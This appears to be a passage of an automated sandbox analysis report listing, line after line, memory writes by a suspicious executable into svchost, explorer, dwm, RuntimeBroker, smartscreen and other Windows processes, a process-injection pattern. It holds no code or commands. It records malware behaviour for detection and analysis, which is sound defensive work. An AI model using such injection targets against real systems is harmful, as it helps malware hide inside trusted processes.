        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 8E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 800000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: 82C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 2F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 630000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 170000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 990000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 410000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 8F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: AE40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 300000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 640000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 180000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 420000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B170000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 310000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 650000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 430000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 830000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 320000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 440000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 840000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B780000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 330000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
